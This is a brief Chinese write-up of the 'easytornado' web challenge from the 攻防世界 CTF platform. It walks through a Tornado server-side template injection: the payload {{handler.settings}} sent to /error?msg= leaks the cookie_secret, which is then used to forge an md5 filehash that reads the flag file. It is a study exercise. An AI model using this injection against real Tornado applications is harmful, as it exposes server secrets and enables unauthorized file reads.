攻防世界web进阶区easytornado
题目有描述提示,tornado框架
打开链接
发现3个文件
1,flag in /fllllllllllllag
2,render,可能会是SSTI模板注入
3,md5(cookie_secret+md5(filename))
url中输入/fllllllllllllag,直接error
用handler.settings对象拿到cookie
url输入/error?msg={{handler.settings}}
根据hint,filehash值由md5加密
先filename即/fllllllllllllag加密,再和cookie拼接,一块md5加密
url加上/file?filename=/fllllllllllllag&filehash=4c2a176027661a2ee12711b55362af2a
得到flag
知识点:tornado框架,用handler.settings对象拿到cookie,md5加密
2020.7.28 公瑾